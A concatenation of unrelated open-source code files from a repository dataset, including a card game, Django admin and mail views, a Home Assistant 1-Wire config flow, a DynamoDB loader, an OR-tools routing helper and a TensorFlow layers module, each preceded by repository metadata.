AllCards[CardsOpen[0]].SetStat(False)
AllCards[CardsOpen[1]].SetStat(False)
CardsOpen.clear()
if (Player+1 > x and PlayerTurn == False):
Player = 1
elif(PlayerTurn == False):
Player += 1
PlayerTurn = False
gamefinished = CheckGame(AllCards)
GameWinner(PlayerPoints)
#Class that creates cards as suggested in the instructions
class Card:
#Constructor
def __init__(self,symbol,value,desc,status):
self._symbol = symbol
if(symbol == "♥"):
self._color = "Hearts"
if(symbol == "♦"):
self._color = "Diamonds"
if(symbol == "♠"):
self._color = "Clubs"
if(symbol == "♣"):
self._color = "Spades"
self._value = value
self._desc = desc
self._status = status
#Setters-Getters
def GetSymb(self):
return self._symbol
def GetDesc(self):
return self._desc
def GetValue(self):
return self._value
def GetStat(self):
return self._status
def GetColor(self):
return self._color
def SetStat(self,status):
self._status = status
main()
| UTF-8 | Python | false | false | 21,206 | py | 8 | MatchingGame.py | 6 | 0.470902 | 0.446605 | 0 | 519 | 37.32948 | 183 |
Aamir-M-Khan/CTPelvic1K | 6,012,954,238,965 | 4090809d6ab9cbb33f22cbdc724685ee9e843bf5 | 1b8c5fcf088b13fae304d3c07682732bc4d781c6 | /nnunet/utilities/file_endings.py | d7f34510bfc3dca3ea108196dadbf30d50d16e86 | [] | no_license | https://github.com/Aamir-M-Khan/CTPelvic1K | 7e1d46dc0483bad9ee621964f4538d3619d79d54 | 79c9b125633803c242b4bf23e3fbf4ec652fdd3d | refs/heads/main | "2023-09-05T17:24:56.544524" | "2021-11-19T14:53:49" | "2021-11-19T14:53:49" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from batchgenerators.utilities.file_and_folder_operations import *
def remove_trailing_slash(filename:str):
return os.path.normpath(filename)
def get_last_folder(foldername: str):
return os.path.basename(remove_trailing_slash(folder))
def maybe_add_0000_to_all_niigz(folder):
nii_gz = subfiles(folder, suffix='.nii.gz')
for n in nii_gz:
n = remove_trailing_slash(n)
if not n.endswith('_0000.nii.gz'):
os.rename(n, n[:-7] + '_0000.nii.gz')
| UTF-8 | Python | false | false | 526 | py | 21 | file_endings.py | 20 | 0.623574 | 0.598859 | 0 | 15 | 32.266667 | 66 |
pta2002/okshop | 10,333,691,353,220 | 3dff261655841ef367f261e40c6a4e3acef16507 | d7090a8bcd87d368b935df1bcf2ea764e2165cad | /shop/admin.py | 548fc5b0d2fba3b5e802af685f48537103a76090 | [
"MIT"
] | permissive | https://github.com/pta2002/okshop | e792549330bf69aaaea4518ba5ed13a41d863983 | 59dd6867e9282a41b66326b389ca160fd27a6218 | refs/heads/master | "2021-01-13T04:42:10.615454" | "2018-11-21T17:34:15" | "2018-11-21T17:34:15" | 79,274,126 | 2 | 1 | MIT | false | "2018-11-21T17:34:17" | "2017-01-17T21:33:34" | "2017-01-17T22:42:18" | "2018-11-21T17:34:16" | 286 | 1 | 1 | 0 | JavaScript | false | null | from django.contrib import admin
from .models import *
# Register your models here.
class ShippingCountryInline(admin.TabularInline):
model = ShippingCountry
classes = ['collapse']
class ProductImageInline(admin.StackedInline):
model = ProductImage
classes = ['collapse']
class DigitalFileInline(admin.StackedInline):
model = DigitalFile
classes = ['collapse']
class DigitalKeyInline(admin.TabularInline):
model = DigitalKey
classes = ['collapse']
@admin.register(DigitalKeySet)
class KeySetAdmin(admin.ModelAdmin):
list_display = ('name', 'product', 'get_stock')
inlines = [DigitalKeyInline]
@admin.register(Product)
class ProductAdmin(admin.ModelAdmin):
list_display = ('product_name', 'seller', 'get_rating', 'price', 'stock',
'physical', 'approved', 'removed')
list_filter = ('approved', 'physical', 'worldwide_shipping',
'free_shipping', 'removed')
fieldsets = (
('Product info', {
'fields': ('product_name', 'product_description',
('price', 'price_currency', 'cached_rate'),
'seller', ('removed', 'delete_on_over'))}),
('Moderation', {'fields': ('approved',)}),
('Shipping/Delivery', {
'fields': (('stock', 'physical'),
('ships_from', 'worldwide_shipping'),
('local_price', 'outside_price', 'free_shipping'))}),
('Digital', {
'fields': ('redeeming_instructions',
('unlimited_stock', 'can_purchase_multiple'))})
)
inlines = (ProductImageInline, DigitalFileInline, ShippingCountryInline)
class CartEntryInline(admin.TabularInline):
model = CartEntry
readonly_fields = ['in_stock']
@admin.register(Cart)
class CartAdmin(admin.ModelAdmin):
list_display = ('user', 'get_number_of_items', 'gettotal', 'has_physical_items')
readonly_fields = ('user', 'gettotal')
inlines = [CartEntryInline]
@admin.register(UserExtra)
class UserExtraAdmin(admin.ModelAdmin):
list_display = ('user', 'verified', 'get_balance', 'get_pending')
list_filter = ('verified',)
readonly_fields = ('get_balance', 'get_pending')
fieldsets = [
('User info', {'fields': ['user']}),
('Moderation', {'fields': ['verified']}),
('Wallet', {'fields': [('get_balance', 'get_pending')]}),
('2FA', {'fields': [('authenticator_id', 'authenticator_verified')]}),
]
@admin.register(Wallet)
class WalletAdmin(admin.ModelAdmin):
list_display = ('label', 'user', 'address', 'get_balance', 'get_pending', 'active')
list_filter = ('active',)
list_editable = ('active',)
readonly_fields = ('user', 'get_balance', 'get_pending', 'address')
fieldsets = [
('Moderation', {'fields': [('user', 'active')]}),
('Wallet info', {'fields': [('label', 'address'), ('get_balance', 'get_pending')]})
]
class PurchaseItemInline(admin.TabularInline):
model = PurchaseItem
@admin.register(Purchase)
class PurchaseAdmin(admin.ModelAdmin):
list_display = ('by', 'get_price', 'get_number_of_items')
readonly_fields = ('by', 'date', 'uuid')
fieldsets = (
(None, {'fields': (('by', 'uuid'), 'date')}),
('Moderation', {'fields': ('notes',), 'classes': ['collapse']})
)
inlines = [PurchaseItemInline]
class ReviewVoteInline(admin.TabularInline):
model = ReviewVote
@admin.register(Review)
class ReviewAdmin(admin.ModelAdmin):
list_display = ('product', 'title', 'get_score', 'get_percentage')
inlines = [ReviewVoteInline]
admin.site.register(UserShop)
admin.site.register(ShippingUpdate)
| UTF-8 | Python | false | false | 3,692 | py | 56 | admin.py | 15 | 0.613489 | 0.613218 | 0 | 117 | 30.555556 | 91 |
hagen93/dumpmail | 8,246,337,247,428 | 24239badad1b8f89d43af0d6c7fccb9805d61c4e | 8855ec1d968c0f8415a80d269517604aace02708 | /mail/views.py | 656cd932c53d0f992fd03838de47e8b456b4dd6f | [
"MIT"
] | permissive | https://github.com/hagen93/dumpmail | 67d6c6c96192ecebfb0b800d971788152bdf5be1 | dcd80d290bcb2408b9205c2b31767b4a2c70c327 | refs/heads/master | "2020-05-23T12:39:54.543734" | "2017-03-13T01:01:46" | "2017-03-13T01:01:46" | 84,769,352 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.conf import settings
from django.shortcuts import render
from mailbox import mbox
from mail.utils import parse_message, message_or_404
def mail(request, item_id):
mbox_file = getattr(settings, "MBOX_FILE", None)
if mbox_file:
mailbox = mbox(mbox_file)
context = {
'all_mail': (parse_message(item, message) for item, message in enumerate(mailbox)),
'current_mail': parse_message(item_id, message_or_404(mailbox, item_id)) if item_id else None,
}
else:
context = {
'all_mail': [],
'current_mail': None,
}
return render(request, 'mail/mail.html', context)
| UTF-8 | Python | false | false | 675 | py | 7 | views.py | 5 | 0.617778 | 0.608889 | 0 | 23 | 28.304348 | 106 |
home-assistant/core | 7,997,229,132,320 | 052f68fdd983374f0b55dea2499435660b97214a | 96dcea595e7c16cec07b3f649afd65f3660a0bad | /homeassistant/components/onewire/config_flow.py | 4764e3b2a550a273e9492c21d8b68e7f3c4fd440 | [
"Apache-2.0"
] | permissive | https://github.com/home-assistant/core | 3455eac2e9d925c92d30178643b1aaccf3a6484f | 80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743 | refs/heads/dev | "2023-08-31T15:41:06.299469" | "2023-08-31T14:50:53" | "2023-08-31T14:50:53" | 12,888,993 | 35,501 | 20,617 | Apache-2.0 | false | "2023-09-14T21:50:15" | "2013-09-17T07:29:48" | "2023-09-14T21:50:03" | "2023-09-14T21:50:15" | 470,852 | 62,888 | 24,675 | 2,641 | Python | false | false | """Config flow for 1-Wire component."""
from __future__ import annotations
from typing import Any
import voluptuous as vol
from homeassistant.config_entries import (
ConfigEntry,
ConfigFlow,
OptionsFlowWithConfigEntry,
)
from homeassistant.const import CONF_HOST, CONF_PORT
from homeassistant.core import HomeAssistant, callback
from homeassistant.data_entry_flow import FlowResult
from homeassistant.helpers import config_validation as cv, device_registry as dr
from homeassistant.helpers.device_registry import DeviceEntry
from .const import (
DEFAULT_HOST,
DEFAULT_PORT,
DEVICE_SUPPORT_OPTIONS,
DOMAIN,
INPUT_ENTRY_CLEAR_OPTIONS,
INPUT_ENTRY_DEVICE_SELECTION,
OPTION_ENTRY_DEVICE_OPTIONS,
OPTION_ENTRY_SENSOR_PRECISION,
PRECISION_MAPPING_FAMILY_28,
)
from .onewirehub import CannotConnect, OneWireHub
DATA_SCHEMA = vol.Schema(
{
vol.Required(CONF_HOST, default=DEFAULT_HOST): str,
vol.Required(CONF_PORT, default=DEFAULT_PORT): int,
}
)
async def validate_input(hass: HomeAssistant, data: dict[str, Any]) -> dict[str, str]:
"""Validate the user input allows us to connect.
Data has the keys from DATA_SCHEMA with values provided by the user.
"""
hub = OneWireHub(hass)
host = data[CONF_HOST]
port = data[CONF_PORT]
# Raises CannotConnect exception on failure
await hub.connect(host, port)
# Return info that you want to store in the config entry.
return {"title": host}
class OneWireFlowHandler(ConfigFlow, domain=DOMAIN):
"""Handle 1-Wire config flow."""
VERSION = 1
def __init__(self) -> None:
"""Initialize 1-Wire config flow."""
self.onewire_config: dict[str, Any] = {}
async def async_step_user(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle 1-Wire config flow start.
Let user manually input configuration.
"""
errors: dict[str, str] = {}
if user_input:
# Prevent duplicate entries
self._async_abort_entries_match(
{
CONF_HOST: user_input[CONF_HOST],
CONF_PORT: user_input[CONF_PORT],
}
)
self.onewire_config.update(user_input)
try:
info = await validate_input(self.hass, user_input)
except CannotConnect:
errors["base"] = "cannot_connect"
else:
return self.async_create_entry(
title=info["title"], data=self.onewire_config
)
return self.async_show_form(
step_id="user",
data_schema=DATA_SCHEMA,
errors=errors,
)
@staticmethod
@callback
def async_get_options_flow(config_entry: ConfigEntry) -> OnewireOptionsFlowHandler:
"""Get the options flow for this handler."""
return OnewireOptionsFlowHandler(config_entry)
class OnewireOptionsFlowHandler(OptionsFlowWithConfigEntry):
"""Handle OneWire Config options."""
configurable_devices: dict[str, str]
"""Mapping of the configurable devices.
`key`: friendly name
`value`: onewire id
"""
devices_to_configure: dict[str, str]
"""Mapping of the devices selected for configuration.
`key`: friendly name
`value`: onewire id
"""
current_device: str
"""Friendly name of the currently selected device."""
async def async_step_init(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Manage the options."""
device_registry = dr.async_get(self.hass)
self.configurable_devices = {
self._get_device_friendly_name(device, device.name): device.name
for device in dr.async_entries_for_config_entry(
device_registry, self.config_entry.entry_id
)
if device.name and device.name[0:2] in DEVICE_SUPPORT_OPTIONS
}
if not self.configurable_devices:
return self.async_abort(reason="No configurable devices found.")
return await self.async_step_device_selection(user_input=None)
async def async_step_device_selection(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Select what devices to configure."""
errors = {}
if user_input is not None:
if user_input.get(INPUT_ENTRY_CLEAR_OPTIONS):
# Reset all options
return self.async_create_entry(data={})
selected_devices: list[str] = (
user_input.get(INPUT_ENTRY_DEVICE_SELECTION) or []
)
if selected_devices:
self.devices_to_configure = {
friendly_name: self.configurable_devices[friendly_name]
for friendly_name in selected_devices
}
return await self.async_step_configure_device(user_input=None)
errors["base"] = "device_not_selected"
return self.async_show_form(
step_id="device_selection",
data_schema=vol.Schema(
{
vol.Optional(
INPUT_ENTRY_CLEAR_OPTIONS,
default=False,
): bool,
vol.Optional(
INPUT_ENTRY_DEVICE_SELECTION,
default=self._get_current_configured_sensors(),
description="Multiselect with list of devices to choose from",
): cv.multi_select(
{
friendly_name: False
for friendly_name in self.configurable_devices
}
),
}
),
errors=errors,
)
async def async_step_configure_device(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Config precision option for device."""
if user_input is not None:
self._update_device_options(user_input)
if self.devices_to_configure:
return await self.async_step_configure_device(user_input=None)
return self.async_create_entry(data=self.options)
self.current_device, onewire_id = self.devices_to_configure.popitem()
data_schema = vol.Schema(
{
vol.Required(
OPTION_ENTRY_SENSOR_PRECISION,
default=self._get_current_setting(
onewire_id, OPTION_ENTRY_SENSOR_PRECISION, "temperature"
),
): vol.In(PRECISION_MAPPING_FAMILY_28),
}
)
return self.async_show_form(
step_id="configure_device",
data_schema=data_schema,
description_placeholders={"sensor_id": self.current_device},
)
@staticmethod
def _get_device_friendly_name(entry: DeviceEntry, onewire_id: str) -> str:
if entry.name_by_user:
return f"{entry.name_by_user} ({onewire_id})"
return onewire_id
def _get_current_configured_sensors(self) -> list[str]:
"""Get current list of sensors that are configured."""
configured_sensors = self.options.get(OPTION_ENTRY_DEVICE_OPTIONS)
if not configured_sensors:
return []
return [
friendly_name
for friendly_name, onewire_id in self.configurable_devices.items()
if onewire_id in configured_sensors
]
def _get_current_setting(self, device_id: str, setting: str, default: Any) -> Any:
"""Get current value for setting."""
if entry_device_options := self.options.get(OPTION_ENTRY_DEVICE_OPTIONS):
if device_options := entry_device_options.get(device_id):
return device_options.get(setting)
return default
def _update_device_options(self, user_input: dict[str, Any]) -> None:
"""Update the global config with the new options for the current device."""
options: dict[str, dict[str, Any]] = self.options.setdefault(
OPTION_ENTRY_DEVICE_OPTIONS, {}
)
onewire_id = self.configurable_devices[self.current_device]
device_options: dict[str, Any] = options.setdefault(onewire_id, {})
if onewire_id[0:2] == "28":
device_options[OPTION_ENTRY_SENSOR_PRECISION] = user_input[
OPTION_ENTRY_SENSOR_PRECISION
]
self.options.update({OPTION_ENTRY_DEVICE_OPTIONS: options})
| UTF-8 | Python | false | false | 8,667 | py | 11,073 | config_flow.py | 9,921 | 0.584401 | 0.58267 | 0 | 253 | 33.256917 | 87 |
roberthluo/Instagram-Account-Analytics | 14,542,759,309,408 | a605e59d7e961fd579190f3a3adfa1a925f9478f | e8741de9f90bbf888dd3909c3556c7dd6a20248d | /parser.py | 2d180107f82f94e070bfb23a7ac3071e90cc7b17 | [] | no_license | https://github.com/roberthluo/Instagram-Account-Analytics | 6b577c157408ec36106b4a903c279c8875063ff6 | 49a8b3bdfdf8e1de40af628151c717f45e2fdaf9 | refs/heads/master | "2021-03-24T10:00:57.354209" | "2018-04-09T01:08:49" | "2018-04-09T01:08:49" | 117,874,255 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import json
import boto3
from collections import OrderedDict
file_name = 'output.json'
# Begin connection to DynamoDB
dynamodb = boto3.resource('dynamodb')
client = boto3.client('dynamodb')
# Get array of table names associated with current AWS account
table_names = client.list_tables()
# Read json data from json file and store in json_data
with open(file_name, 'r') as data_file:
json_data = data_file.read()
# Store list where each item is a dict
img_result_list = json.loads(json_data)
# Check if table exists
def checkExists():
if not 'imagetags' in table_names['TableNames']:
#If imagetags table does not exists, create it
table = dynamodb.create_table(
TableName = 'imagetags',
KeySchema =
[
{
'AttributeName': 'username',
'KeyType': 'HASH'
}
],
AttributeDefinitions =
[
{
'AttributeName': 'username',
'AttributeType': 'S'
}
],
ProvisionedThroughput =
{
'ReadCapacityUnits': 5,
'WriteCapacityUnits': 5
}
)
# Wait until the table exists.
table.meta.client.get_waiter('table_exists').wait(TableName='imagetags')
insertTuples(table)
else:
# If the table exists, insert tuples
table = dynamodb.Table('imagetags')
insertTuples(table)
def insertTuples(table, img_result_list = img_result_list):
prev_user = ''
count = 0
obj = {}
fields = []
result = []
for img in img_result_list:
# Access each individual images rekognizer output
file_name = img["File_Name"] #store name
labels_list = img["Analysis"]["Labels"] #list of tags
username = str(file_name.split('/')[1].strip()) #get username from filepath
#Put this item name and labels in a dictionary for easy tuple insert
if(username != prev_user):
if(count > 0):
obj['username'] = prev_user
obj['fields'] = fields
result.append(obj.copy())
fields = [] #reset fieilds for next username
count = 0
for label in labels_list:
if label['Confidence'] > 90:
# Only add labels with over 90 confidence
fields.append(label['Name'])
count = count + 1
prev_user = username
else:
#User is not new
for label in labels_list:
if label['Confidence'] > 90:
fields.append(label['Name'])
count = count + 1
# At the end add the last username and list
obj['username'] = username
obj['fields'] = fields
result.append(obj.copy())
list_items = []
for i in result:
num = 1
#For each username list pair in results
item = OrderedDict()
item['username'] = i['username']
for tag in i['fields']:
label_string = 'label' + str(num)
item[label_string] = tag
num += 1
list_items.append(item.copy())
for user in list_items:
print(user)
table.put_item(Item = user)
checkExists()
| UTF-8 | Python | false | false | 2,952 | py | 9 | parser.py | 6 | 0.611111 | 0.604675 | 0 | 105 | 26.095238 | 91 |
munnellg/elltm | 9,251,359,598,463 | d1888ab5f091a3ed8d739d84db035fa00d8cf2e6 | 9f90abd6db3125c6ce0946e5a7d76fcc97cd49d3 | /to_line_corpus.py | 7aebb9a96b74885cf9e501bfe5720d8cd8520c6a | [
"MIT"
] | permissive | https://github.com/munnellg/elltm | 68c7c3d155bca49ffab46fc05273478160b5f945 | ccb80d1f16145f35df5042a304a5a09faf4021e0 | refs/heads/master | "2021-01-10T06:54:06.047349" | "2015-12-09T13:53:42" | "2015-12-09T13:53:42" | 47,148,792 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sys
import bz2
from optparse import OptionParser
from docs import config
from lib.tokenizer import text_to_sentences
def build_opt_parser():
usage = "usage: %prog [options] <filename> [, <filename>, ...]"
parser = OptionParser(usage=usage)
parser.add_option("-o", "--out-file", dest="out_file",
default=config.default_line_out_file,
help="The file to which the output will be written"
)
return parser
# Parse commandline arguments using OptionParser given
def parse_arguments(parser):
(options, args) = parser.parse_args()
if len(args) < 1:
parser.print_help()
exit()
return options, args
def main():
parser = build_opt_parser()
(options, args) = parse_arguments(parser)
with bz2.BZ2File(options.out_file, 'w') as line_corpus:
for fname in args:
with open(fname, "r") as f:
fcontents = f.read()
sentences = text_to_sentences(fcontents)
for sentence in sentences:
line_corpus.write('{0}\n'.format(sentence))
if __name__ == "__main__":
main()
| UTF-8 | Python | false | false | 1,158 | py | 16 | to_line_corpus.py | 14 | 0.595855 | 0.591537 | 0 | 42 | 26.571429 | 73 |
dguptaruby/travellers_route | 3,161,095,932,503 | a83e2b81f377a5ac43c9a1e651d381fe031ba670 | 9f7719573155b80e7875c4b9bb80ddbe6430405d | /traveller/utils.py | 59ce1151fc3b35f51d80c428708266a5769c9650 | [] | no_license | https://github.com/dguptaruby/travellers_route | ff07189346c712f280bc08166d6d5fc873b6b81c | 6d9c2274e88faece5be18199ae6b08d93db85bc5 | refs/heads/main | "2023-08-01T22:52:11.896118" | "2021-09-15T10:14:36" | "2021-09-15T10:14:36" | 406,672,805 | 0 | 0 | null | false | "2021-09-15T10:06:15" | "2021-09-15T08:21:36" | "2021-09-15T09:57:20" | "2021-09-15T10:06:14" | 8 | 0 | 0 | 0 | Python | false | false | """Simple travelling salesman problem between cities."""
import math
from math import cos
from math import sin
from math import asin
from math import sqrt
from math import radians
from collections import namedtuple
from ortools.constraint_solver import routing_enums_pb2
from ortools.constraint_solver import pywrapcp
import numpy as np
# Declaring namedtuple()
Location = namedtuple("Point", ["longitude", "latitude"])
class RouteFinder:
def __init__(
self, distance_matrix, coordinate_list=None, num_vehicles=None, depot=None
):
self.coordinate_list = coordinate_list
self.data = {
"distance_matrix": distance_matrix,
"num_vehicles": num_vehicles if num_vehicles else 1,
"depot": depot if depot else 0,
}
self.response = {}
def print_solution(self, manager, routing, solution):
# self.response['Objective'] = '{} miles'.format(solution.ObjectiveValue())
index = routing.Start(0)
plan_output = "Route for vehicle: "
route_distance = 0
while not routing.IsEnd(index):
plan_output += " {} ->".format(
self.coordinate_list[manager.IndexToNode(index)]
)
previous_index = index
index = solution.Value(routing.NextVar(index))
route_distance += routing.GetArcCostForVehicle(previous_index, index, 0)
plan_output += " {}".format(self.coordinate_list[manager.IndexToNode(index)])
self.response["plan_output"] = plan_output
# self.response['Route distance']= '{} miles'.format(route_distance)
def find_route(self):
"""Entry point of the program."""
# Create the routing index manager.
manager = pywrapcp.RoutingIndexManager(
len(self.data["distance_matrix"]),
self.data["num_vehicles"],
self.data["depot"],
)
# Create Routing Model.
routing = pywrapcp.RoutingModel(manager)
def distance_callback(from_index, to_index):
"""Returns the distance between the two nodes."""
# Convert from routing variable Index to distance matrix NodeIndex.
from_node = manager.IndexToNode(from_index)
to_node = manager.IndexToNode(to_index)
return self.data["distance_matrix"][from_node][to_node]
transit_callback_index = routing.RegisterTransitCallback(distance_callback)
# Define cost of each arc.
routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)
# Setting first solution heuristic.
search_parameters = pywrapcp.DefaultRoutingSearchParameters()
search_parameters.first_solution_strategy = (
routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC
)
# Solve the problem.
solution = routing.SolveWithParameters(search_parameters)
# Print solution on console.
if solution:
self.print_solution(manager, routing, solution)
return self.response
class DistanceMatrix:
def __init__(self, coordinate_sequence):
self.source = coordinate_sequence
self.destination = coordinate_sequence
self.distance_matrix = []
def haversine(self, pointA, pointB):
if (type(pointA) != tuple) or (type(pointB) != tuple):
raise TypeError("Only tuples are supported as arguments")
lat1 = pointA[1]
lon1 = pointA[0]
lat2 = pointB[1]
lon2 = pointB[0]
# convert decimal degrees to radians
lat1, lon1, lat2, lon2 = map(
radians, [float(lat1), float(lon1), float(lat2), float(lon2)]
)
# haversine formula
dlon = lon2 - lon1
dlat = lat2 - lat1
a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2
c = 2 * asin(sqrt(a))
r = 6371 # Radius of earth in kilometers. Use 3956 for miles
# returns result in kilometer
return c * r
def sqrt_distance(self, pointA, pointB):
lat1 = pointA[1]
lon1 = pointA[0]
lat2 = pointB[1]
lon2 = pointB[0]
dlon = lon2 - lon1
dlat = lat2 - lat1
return math.sqrt(dlon ** 2 + dlat ** 2)
def create_distance_matrix(self):
for pointA in self.source:
row = []
for pointB in self.destination:
row.append(self.sqrt_distance(pointA, pointB))
self.distance_matrix.append(row)
return self.distance_matrix
| UTF-8 | Python | false | false | 4,530 | py | 5 | utils.py | 3 | 0.61479 | 0.602428 | 0 | 127 | 34.669291 | 85 |
xyloguy/cs1410-2018-20-50-examples | 2,087,354,121,651 | 180ae33c1381c29c3bece617e429ebb6a7fe461b | 5e95f55385b84c233b6151c6d3974fa931617ee5 | /2018-03-07_inheritance/marker/sharpiemarker.py | c40fff40df9b2795b9bed5620343adad605bb69f | [] | no_license | https://github.com/xyloguy/cs1410-2018-20-50-examples | 3e95988a22389b9ad83599c3a975135fb022b572 | 1d0e145bc8102e5e3e5dd0d4b92e1b455b47aa36 | refs/heads/master | "2021-05-05T14:19:21.559204" | "2018-04-26T01:22:25" | "2018-04-26T01:22:25" | 118,478,575 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from marker import Marker
class SharpieMarker(Marker):
def __init__(self, color):
Marker.__init__(self, color, 3, 0.005, False)
if __name__ == '__main__':
red_sharpie = SharpieMarker((255, 0, 0))
red_sharpie.set_owner('Bob')
print(red_sharpie.write(), red_sharpie.color, red_sharpie.tip, red_sharpie.owner)
| UTF-8 | Python | false | false | 335 | py | 64 | sharpiemarker.py | 61 | 0.635821 | 0.60597 | 0 | 12 | 26.916667 | 85 |
TamakiRinko/HuaQiBei | 14,611,478,746,992 | de4f9d0a4ac22ea18eeb37fc25dfc81369e47f32 | 05a136b3552ff14ae88a6ff72e01b42d35a750d7 | /推荐及更新/Temp.py | 92f00c11e1c35089eea4f6a9bf2ebc67ea176a2a | [] | no_license | https://github.com/TamakiRinko/HuaQiBei | 2fe44d6fe38b588910ce1aa12a3f1785cf6ff296 | b6c206d39d3f0d16d374da25bc2a10710279c7d2 | refs/heads/master | "2020-07-08T15:15:05.355791" | "2019-10-10T03:56:07" | "2019-10-10T03:56:07" | 203,709,595 | 2 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | import surprise as sp
list = [1, 3]
print(list)
| UTF-8 | Python | false | false | 49 | py | 46 | Temp.py | 22 | 0.673469 | 0.632653 | 0 | 4 | 11.25 | 21 |
WiproOpenSourcePractice/galaxia | 8,057,358,655,775 | 2c80ca8b295f220f16a56dcdede2a4e74dc7648c | 585c80facd190a9cb4f292bf692c8b70b726b9ef | /galaxia/gcmd/exporter.py | 2f668aca2d05b8b383de1f7046ceb0d69c8f4ab2 | [
"Apache-2.0"
] | permissive | https://github.com/WiproOpenSourcePractice/galaxia | 45da9b2fbab004f7177965b56787cbc54fa53364 | baa6ea0a2192625dce2df7daddb1d983520bb7ab | refs/heads/master | "2021-01-24T14:32:50.747049" | "2019-11-12T16:17:38" | "2019-11-12T16:17:38" | 54,614,980 | 25 | 20 | null | false | "2016-06-08T03:46:56" | "2016-03-24T04:40:15" | "2016-05-20T10:31:25" | "2016-06-08T03:46:56" | 213 | 3 | 9 | 28 | Python | null | null | # Copyright 2016 - Wipro Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module start galaxia exporter service
"""
import logging
import os
import sys
from oslo_config import cfg
from galaxia.common import service
from galaxia.common.rpc import broker
from galaxia.gexporter.controller import controller
# Register options for the galaxia exporter service
API_SERVICE_OPTS = [
cfg.StrOpt('rabbitmq_host',
default='localhost',
help='The host for the rabbitmq server'),
cfg.IntOpt('rabbitmq_port',
default='5672',
help='The port for the rabbitmq server'),
cfg.StrOpt('topic',
default='test',
help='The topic'),
cfg.StrOpt('rabbitmq_username',
default='guest',
help='The username for the rabbitmq server'),
]
log = logging.getLogger(__name__)
def main():
service.prepare_service("gexporter", sys.argv)
CONF = cfg.CONF
opt_group = cfg.OptGroup(name='gexporter', title='Options for the\
exporter service')
CONF.register_group(opt_group)
CONF.register_opts(API_SERVICE_OPTS, opt_group)
CONF.set_override('topic', CONF.gexporter.topic, opt_group)
CONF.set_override('rabbitmq_host', CONF.gexporter.rabbitmq_host, opt_group)
CONF.set_override('rabbitmq_port', CONF.gexporter.rabbitmq_port, opt_group)
CONF.set_override('rabbitmq_username', CONF.gexporter.rabbitmq_username,
opt_group)
endpoints = [
controller.Controller(),
]
log.info('Starting exporter service in PID %s' % os.getpid())
rpc_server = broker.Broker(CONF.gexporter.topic,
CONF.gexporter.rabbitmq_host,
endpoints)
print 'Galaxia Exporter service started in PID %s' % os.getpid()
rpc_server.serve()
| UTF-8 | Python | false | false | 2,416 | py | 80 | exporter.py | 45 | 0.653974 | 0.649007 | 0 | 72 | 32.555556 | 79 |
williamfzc/GitUserSwitch | 15,333,033,260,091 | dd948760ff72c770d484d6527c25ce40848d4ae7 | 16a5180db70f2ffeea6808ff28049020b147cf45 | /git_conf.py | 08153a320befbb789e214ae4a4562c0e32521e38 | [
"MIT"
] | permissive | https://github.com/williamfzc/GitUserSwitch | cbce7fd7bbfbbe7353afb04b3ec743c73fbec52a | 60482ff58dc8eae1fb4de358b25e044dc4c1f4f9 | refs/heads/master | "2021-09-01T13:37:32.442459" | "2017-12-27T08:30:57" | "2017-12-27T08:30:57" | 115,414,955 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # CONF OF GIT USER
GIT_DICT = {
'TP_LINK': {
'username': 'Feng Zhangchi',
'email': '123456789@qq.com'
},
'GITHUB': {
'username': 'williamfzc',
'email': '246@qq.com'
},
'SOMETHING_ELSE': {
'username': 'abc',
'email': '135@qq.com'
}
}
# URL IN GITHUB
EASY_TK_URL = 'https://github.com/williamfzc/easy_tk.git'
| UTF-8 | Python | false | false | 383 | py | 3 | git_conf.py | 2 | 0.501305 | 0.462141 | 0 | 20 | 18.1 | 57 |
Xue-zhen-zhen/Protein-subcellular-location | 7,361,573,987,872 | 3eb0bcbd3c2d662e052e571b5e98e98eff877540 | 744deb9925bc75427dbf65c9defa9120c849ca6e | /code/part3/GapNet-PL/tensorflow_models/TeLL/layers.py | f957be95628022b0fcbdb7d2482c51a83ece2e8b | [
"BSD-2-Clause"
] | permissive | https://github.com/Xue-zhen-zhen/Protein-subcellular-location | f4dfc94edebc2e3bf3c215d02bfe9e4708a00798 | 401eb93d311cea9a115253cc2aefbb4b9ffe30e9 | refs/heads/master | "2021-08-18T16:08:54.838031" | "2021-05-28T13:49:47" | "2021-05-28T13:49:47" | 253,808,243 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
"""
© Michael Widrich, Markus Hofmarcher, 2017
Different classes and utility functions for stack-able network layers
See architectures/sample_architectures.py for some usage examples
"""
import numbers
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.layers import utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
# ------------------------------------------------------------------------------------------------------------------
# Imports
# ------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------
# Functions
# ------------------------------------------------------------------------------------------------------------------
def tof(i, shape):
"""Check whether i is tensor or initialization function; return tensor or initialized tensor;
Parameters
-------
i : tensor or function
Tensor or function to initialize tensor
shape : list or tuple
Shape of tensor to initialize
Returns
-------
: tensor
Tensor or initialized tensor
"""
if callable(i):
return i(shape)
else:
return i
def tofov(i, shape=None, var_params=None):
